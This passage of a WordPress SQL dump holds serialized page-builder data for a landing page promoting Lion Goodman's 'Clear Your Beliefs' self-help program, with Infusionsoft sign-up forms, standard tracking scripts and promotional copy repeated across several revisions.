src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1204:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top:-10px !important; width:100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"</div>\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form style="position: relative; bottom: -58px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1309, 1770, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1202:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top:0px !important; width:100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"</div>\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form style="position: relative; bottom: -58px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1310, 1771, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1202:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top:0px !important; width:100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"</div>\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form style="position: relative; bottom: -58px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2814:"<div 